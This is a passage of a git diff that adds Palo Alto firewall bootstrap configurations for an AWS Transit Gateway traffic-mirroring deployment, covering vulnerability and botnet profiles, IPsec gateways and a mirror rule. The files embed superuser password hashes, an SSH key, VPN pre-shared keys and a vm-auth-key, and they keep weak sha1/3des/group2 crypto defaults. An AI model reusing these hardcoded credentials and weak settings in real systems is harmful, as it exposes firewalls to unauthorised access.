+                  <log-end>yes</log-end>
+                </entry>
+                <entry name="interzone-default">
+                  <action>deny</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+              </rules>
+            </default-security-rules>
+          </rulebase>
+          <import>
+            <network>
+              <interface>
+                <member>ethernet1/1</member>
+                <member>ethernet1/2</member>
+              </interface>
+            </network>
+          </import>
+          <profiles>
+            <vulnerability>
+              <entry name="strict-1">
+                <rules>
+                  <entry name="simple-client-critical">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>critical</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>client</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-client-high">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>high</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>client</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-client-medium">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>medium</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>client</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-client-informational">
+                    <action>
+                      <default/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>informational</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>client</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-client-low">
+                    <action>
+                      <default/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>low</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>client</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-server-critical">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>critical</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>server</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-server-high">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>high</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>server</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-server-medium">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>medium</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>server</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-server-informational">
+                    <action>
+                      <default/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>informational</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>server</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-server-low">
+                    <action>
+                      <default/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>low</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>server</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                </rules>
+              </entry>
+            </vulnerability>
+          </profiles>
+        </entry>
+      </vsys>
+    </entry>
+  </devices>
+</config>
diff --git a/aws/TGW-VPC-Mirroring/bootstrap_files2/init-cfg.txt b/aws/TGW-VPC-Mirroring/bootstrap_files2/init-cfg.txt
new file mode 100644
index 00000000..8d8c673c
--- /dev/null
+++ b/aws/TGW-VPC-Mirroring/bootstrap_files2/init-cfg.txt
@@ -0,0 +1,19 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+hostname=
+panorama-server=
+panorama-server-2=
+tplname=
+dgname=
+dns-primary=8.8.8.8
+dns-secondary=
+vm-auth-key=
+op-command-modes=mgmt-interface-swap
+dhcp-send-hostname=yes
+dhcp-send-client-id=yes
+dhcp-accept-server-hostname=yes
+dhcp-accept-server-domain=yes
diff --git a/aws/TGW-VPC-Mirroring/bootstrap_files3/authcodes b/aws/TGW-VPC-Mirroring/bootstrap_files3/authcodes
new file mode 100644
index 00000000..0519ecba
--- /dev/null
+++ b/aws/TGW-VPC-Mirroring/bootstrap_files3/authcodes
@@ -0,0 +1 @@
+ 
\ No newline at end of file
diff --git a/aws/TGW-VPC-Mirroring/bootstrap_files3/bootstrap.xml b/aws/TGW-VPC-Mirroring/bootstrap_files3/bootstrap.xml
new file mode 100644
index 00000000..0bc73e6e
--- /dev/null
+++ b/aws/TGW-VPC-Mirroring/bootstrap_files3/bootstrap.xml
@@ -0,0 +1,857 @@
+<?xml version="1.0"?>
+<config urldb="paloaltonetworks" version="9.0.0">
+  <mgt-config>
+    <users>
+      <entry name="admin">
+        <phash>$1$cweppdgb$pU2XxH3TD.QyD29.TXnVT.</phash>
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5</public-key>
+      </entry>
+      <entry name="fwadmin">
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <phash>$1$kouigbds$mrNbt/msQehCS55jxNnYa.</phash>
+      </entry>
+    </users>
+  </mgt-config>
+  <shared>
+    <application/>
+    <application-group/>
+    <service/>
+    <service-group/>
+    <botnet>
+      <configuration>
+        <http>
+          <dynamic-dns>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </dynamic-dns>
+          <malware-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </malware-sites>
+          <recent-domains>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </recent-domains>
+          <ip-domains>
+            <enabled>yes</enabled>
+            <threshold>10</threshold>
+          </ip-domains>
+          <executables-from-unknown-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </executables-from-unknown-sites>
+        </http>
+        <other-applications>
+          <irc>yes</irc>
+        </other-applications>
+        <unknown-applications>
+          <unknown-tcp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-tcp>
+          <unknown-udp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-udp>
+        </unknown-applications>
+      </configuration>
+      <report>
+        <topn>100</topn>
+        <scheduled>yes</scheduled>
+      </report>
+    </botnet>
+    <content-preview>
+      <application/>
+      <application-type>
+        <category/>
+        <technology/>
+      </application-type>
+    </content-preview>
+  </shared>
+  <devices>
+    <entry name="localhost.localdomain">
+      <network>
+        <interface>
+          <ethernet>
+            <entry name="ethernet1/1">
+              <layer3>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+                <dhcp-client/>
+                <interface-management-profile>LB Healthcheck</interface-management-profile>
+              </layer3>
+            </entry>
+            <entry name="ethernet1/2">
+              <layer3>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <dhcp-client>
+                  <create-default-route>no</create-default-route>
+                </dhcp-client>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+              </layer3>
+              <link-state>down</link-state>
+            </entry>
+          </ethernet>
+          <tunnel>
+            <units/>
+          </tunnel>
+        </interface>
+        <profiles>
+          <monitor-profile>
+            <entry name="default">
+              <interval>3</interval>
+              <threshold>5</threshold>
+              <action>wait-recover</action>
+            </entry>
+          </monitor-profile>
+          <interface-management-profile>
+            <entry name="LB Healthcheck">
+              <http>yes</http>
+            </entry>
+          </interface-management-profile>
+        </profiles>
+        <ike>
+          <crypto-profiles>
+            <ike-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                  <member>3des</member>
+                </encryption>
+                <hash>
+                  <member>sha1</member>
+                </hash>
+                <dh-group>
+                  <member>group2</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha256</member>
+                </hash>
+                <dh-group>
+                  <member>group19</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <encryption>
+                  <member>aes-256-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha384</member>
+                </hash>
+                <dh-group>
+                  <member>group20</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="aws">
+                <hash>
+                  <member>sha1</member>
+                </hash>
+                <dh-group>
+                  <member>group2</member>
+                </dh-group>
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <lifetime>
+                  <seconds>28800</seconds>
+                </lifetime>
+              </entry>
+            </ike-crypto-profiles>
+            <ipsec-crypto-profiles>
+              <entry name="default">
+                <esp>
+                  <encryption>
+                    <member>aes-128-cbc</member>
+                    <member>3des</member>
+                  </encryption>
+                  <authentication>
+                    <member>sha1</member>
+                  </authentication>
+                </esp>
+                <dh-group>group2</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <esp>
+                  <encryption>
+                    <member>aes-128-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group19</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <esp>
+                  <encryption>
+                    <member>aes-256-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group20</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="aws">
+                <esp>
+                  <authentication>
+                    <member>sha1</member>
+                  </authentication>
+                  <encryption>
+                    <member>aes-128-cbc</member>
+                  </encryption>
+                </esp>
+                <lifetime>
+                  <seconds>3600</seconds>
+                </lifetime>
+                <dh-group>group2</dh-group>
+              </entry>
+            </ipsec-crypto-profiles>
+            <global-protect-app-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <authentication>
+                  <member>sha1</member>
+                </authentication>
+              </entry>
+            </global-protect-app-crypto-profiles>
+          </crypto-profiles>
+          <gateway>
+            <entry name="VPN1">
+              <authentication>
+                <pre-shared-key>
+                  <key>-AQ==03WuQF4bZmvokbM9qLJwY6M9dbc=BUUtm3Pm3SpSd3q9y07uXzlJ2he3viHPQ1KZpb1V2rHqScOoKmGf2EldcIaQ2z12</key>
+                </pre-shared-key>
+              </authentication>
+              <protocol>
+                <ikev1>
+                  <dpd>
+                    <enable>yes</enable>
+                    <interval>10</interval>
+                    <retry>3</retry>
+                  </dpd>
+                  <ike-crypto-profile>aws</ike-crypto-profile>
+                  <exchange-mode>main</exchange-mode>
+                </ikev1>
+                <ikev2>
+                  <dpd>
+                    <enable>yes</enable>
+                  </dpd>
+                </ikev2>
+              </protocol>
+              <protocol-common>
+                <nat-traversal>
+                  <enable>no</enable>
+                </nat-traversal>
+                <fragmentation>
+                  <enable>no</enable>
+                </fragmentation>
+              </protocol-common>
+              <local-address>
+                <interface>ethernet1/1</interface>
+              </local-address>
+              <peer-address>
+                <ip>34.252.94.101</ip>
+              </peer-address>
+            </entry>
+            <entry name="VPN2">
+              <authentication>
+                <pre-shared-key>
+                  <key>-AQ==Wd8wW4JkNwoNs0I49P3xNMnt3iA=e3T0TArSWXtHvUlQQQ5OMK+4xD6oFBpdV+jvdgPsU6F4fdzNNo71uC7f1HnxknN4</key>
+                </pre-shared-key>
+              </authentication>
+              <protocol>
+                <ikev1>
+                  <dpd>
+                    <enable>yes</enable>
+                    <interval>10</interval>
+                    <retry>3</retry>
+                  </dpd>
+                  <ike-crypto-profile>aws</ike-crypto-profile>
+                  <exchange-mode>main</exchange-mode>
+                </ikev1>
+                <ikev2>
+                  <dpd>
+                    <enable>yes</enable>
+                  </dpd>
+                </ikev2>
+              </protocol>
+              <protocol-common>
+                <nat-traversal>
+                  <enable>no</enable>
+                </nat-traversal>
+                <fragmentation>
+                  <enable>no</enable>
+                </fragmentation>
+              </protocol-common>
+              <local-address>
+                <interface>ethernet1/1</interface>
+              </local-address>
+              <peer-address>
+                <ip>52.211.42.95</ip>
+              </peer-address>
+            </entry>
+          </gateway>
+        </ike>
+        <qos>
+          <profile>
+            <entry name="default">
+              <class>
+                <entry name="class1">
+                  <priority>real-time</priority>
+                </entry>
+                <entry name="class2">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class3">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class4">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class5">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class6">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class7">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class8">
+                  <priority>low</priority>
+                </entry>
+              </class>
+            </entry>
+          </profile>
+        </qos>
+        <virtual-router>
+          <entry name="vr">
+            <protocol>
+              <bgp>
+                <enable>no</enable>
+                <dampening-profile>
+                  <entry name="default">
+                    <cutoff>1.25</cutoff>
+                    <reuse>0.5</reuse>
+                    <max-hold-time>900</max-hold-time>
+                    <decay-half-life-reachable>300</decay-half-life-reachable>
+                    <decay-half-life-unreachable>900</decay-half-life-unreachable>
+                    <enable>yes</enable>
+                  </entry>
+                </dampening-profile>
+                <routing-options>
+                  <graceful-restart>
+                    <enable>yes</enable>
+                  </graceful-restart>
+                </routing-options>
+                <install-route>no</install-route>
+              </bgp>
+              <rip>
+                <enable>no</enable>
+              </rip>
+              <ospf>
+                <enable>no</enable>
+              </ospf>
+              <ospfv3>
+                <enable>no</enable>
+              </ospfv3>
+            </protocol>
+            <interface>
+              <member>ethernet1/1</member>
+              <member>ethernet1/2</member>
+            </interface>
+            <ecmp>
+              <algorithm>
+                <ip-modulo/>
+              </algorithm>
+            </ecmp>
+          </entry>
+        </virtual-router>
+        <tunnel>
+          <ipsec/>
+        </tunnel>
+      </network>
+      <deviceconfig>
+        <system>
+          <type>
+            <dhcp-client>
+              <send-hostname>yes</send-hostname>
+              <send-client-id>yes</send-client-id>
+              <accept-dhcp-hostname>yes</accept-dhcp-hostname>
+              <accept-dhcp-domain>yes</accept-dhcp-domain>
+            </dhcp-client>
+          </type>
+          <update-server>updates.paloaltonetworks.com</update-server>
+          <update-schedule>
+            <threats>
+              <recurring>
+                <weekly>
+                  <day-of-week>wednesday</day-of-week>
+                  <at>01:02</at>
+                  <action>download-only</action>
+                </weekly>
+              </recurring>
+            </threats>
+          </update-schedule>
+          <timezone>US/Pacific</timezone>
+          <service>
+            <disable-telnet>yes</disable-telnet>
+            <disable-http>yes</disable-http>
+          </service>
+          <hostname>FW-1</hostname>
+          <panorama-server>18.224.86.63</panorama-server>
+        </system>
+        <setting>
+          <config>
+            <rematch>yes</rematch>
+          </config>
+          <management>
+            <hostname-type-in-syslog>FQDN</hostname-type-in-syslog>
+            <initcfg>
+              <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5</public-key>
+              <type>
+                <dhcp-client>
+                  <send-hostname>yes</send-hostname>
+                  <send-client-id>yes</send-client-id>
+                  <accept-dhcp-hostname>yes</accept-dhcp-hostname>
+                  <accept-dhcp-domain>yes</accept-dhcp-domain>
+                </dhcp-client>
+              </type>
+              <panorama-server>18.224.86.63</panorama-server>
+              <dns-primary>8.8.8.8</dns-primary>
+              <vm-auth-key>382932559738703</vm-auth-key>
+              <op-command-modes>mgmt-interface-swap</op-command-modes>
+            </initcfg>
+          </management>
+        </setting>
+      </deviceconfig>
+      <vsys>
+        <entry name="vsys1">
+          <application/>
+          <application-group/>
+          <zone>
+            <entry name="mirror">
+              <network>
+                <layer3>
+                  <member>ethernet1/1</member>
+                </layer3>
+              </network>
+            </entry>
+          </zone>
+          <service>
+            <entry name="tcp-1001">
+              <protocol>
+                <tcp>
+                  <port>1001</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="tcp-2001">
+              <protocol>
+                <tcp>
+                  <port>2001</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="tcp-1002">
+              <protocol>
+                <tcp>
+                  <port>1002</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="tcp-2002">
+              <protocol>
+                <tcp>
+                  <port>2002</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+          </service>
+          <service-group/>
+          <schedule/>
+          <rulebase>
+            <security>
+              <rules>
+                <entry name="Mirror" uuid="9466bbc8-f16b-46a1-a548-aaabcf3dbeec">
+                  <to>
+                    <member>mirror</member>
+                  </to>
+                  <from>
+                    <member>mirror</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                  <log-start>yes</log-start>
+                  <rule-type>intrazone</rule-type>
+                  <profile-setting>
+                    <profiles>
+                      <url-filtering>
+                        <member>default</member>
+                      </url-filtering>
+                      <file-blocking>
+                        <member>strict file blocking</member>
+                      </file-blocking>
+                      <virus>
+                        <member>default</member>
+                      </virus>
+                      <spyware>
+                        <member>strict</member>
+                      </spyware>
+                      <vulnerability>
+                        <member>strict-1</member>
+                      </vulnerability>
+                      <wildfire-analysis>
+                        <member>default</member>
+                      </wildfire-analysis>
+                    </profiles>
+                  </profile-setting>
+                </entry>
+              </rules>
+            </security>
+            <nat>
+              <rules/>
+            </nat>
+            <default-security-rules>
+              <rules>
+                <entry name="intrazone-default" uuid="be660829-ab78-4a61-8871-b75510f3ecfc">
+                  <action>allow</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+                <entry name="interzone-default" uuid="e34e1560-4e25-4254-b9bb-2c134f8b9121">
+                  <action>deny</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+              </rules>
+            </default-security-rules>
+            <tunnel-inspect>
+              <rules>
+                <entry name="Mirror" uuid="89ed6279-2e2c-49e2-889b-4f605d4a62ed">
+                  <monitor-options>
+                    <log-setting-override>
+                      <enable>no</enable>
+                    </log-setting-override>
+                  </monitor-options>
+                  <application>
+                    <member>vxlan</member>
+                  </application>
+                  <from>
+                    <member>any</member>
+                  </from>
+                  <to>
+                    <member>any</member>
+                  </to>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                </entry>
+              </rules>
+            </tunnel-inspect>
+          </rulebase>
+          <import>
+            <network>
+              <interface>
+                <member>ethernet1/1</member>
+                <member>ethernet1/2</member>
+              </interface>
+            </network>
+          </import>
+          <profiles>
+            <vulnerability>
+              <entry name="strict-1">
+                <rules>
+                  <entry name="simple-client-critical">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>critical</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>client</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-client-high">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>high</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>client</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-client-medium">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>medium</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>client</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-client-informational">
+                    <action>
+                      <default/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>informational</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>client</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-client-low">
+                    <action>
+                      <default/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>low</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>client</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-server-critical">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>critical</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>server</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-server-high">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>high</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>server</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-server-medium">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>medium</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>server</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-server-informational">
+                    <action>
+                      <default/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>informational</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>server</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-server-low">
+                    <action>
+                      <default/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>low</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>server</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                </rules>
+              </entry>
+            </vulnerability>
+            <custom-url-category/>
+          </profiles>
+        </entry>
+      </vsys>
+    </entry>
+  </devices>
+</config>
diff --git a/aws/TGW-VPC-Mirroring/bootstrap_files3/init-cfg.txt b/aws/TGW-VPC-Mirroring/bootstrap_files3/init-cfg.txt
new file mode 100644
index 00000000..8d8c673c
--- /dev/null
+++ b/aws/TGW-VPC-Mirroring/bootstrap_files3/init-cfg.txt
@@ -0,0 +1,19 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+hostname=
+panorama-server=
+panorama-server-2=
+tplname=
+dgname=
+dns-primary=8.8.8.8
+dns-secondary=
+vm-auth-key=
+op-command-modes=mgmt-interface-swap
+dhcp-send-hostname=yes
+dhcp-send-client-id=yes
+dhcp-accept-server-hostname=yes
+dhcp-accept-server-domain=yes
diff --git a/aws/TGW-VPC-Mirroring/bootstrap_files4/authcodes b/aws/TGW-VPC-Mirroring/bootstrap_files4/authcodes
new file mode 100644
index 00000000..0519ecba
--- /dev/null
+++ b/aws/TGW-VPC-Mirroring/bootstrap_files4/authcodes
@@ -0,0 +1 @@
+ 
\ No newline at end of file
diff --git a/aws/TGW-VPC-Mirroring/bootstrap_files4/bootstrap.xml b/aws/TGW-VPC-Mirroring/bootstrap_files4/bootstrap.xml
new file mode 100644
index 00000000..47244dd3
--- /dev/null
+++ b/aws/TGW-VPC-Mirroring/bootstrap_files4/bootstrap.xml
@@ -0,0 +1,1018 @@
+<?xml version="1.0"?>
+<config urldb="paloaltonetworks" version="9.0.0">
+  <mgt-config>
+    <users>
+      <entry name="admin">
+        <phash>$1$cweppdgb$pU2XxH3TD.QyD29.TXnVT.</phash>
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5</public-key>
+      </entry>
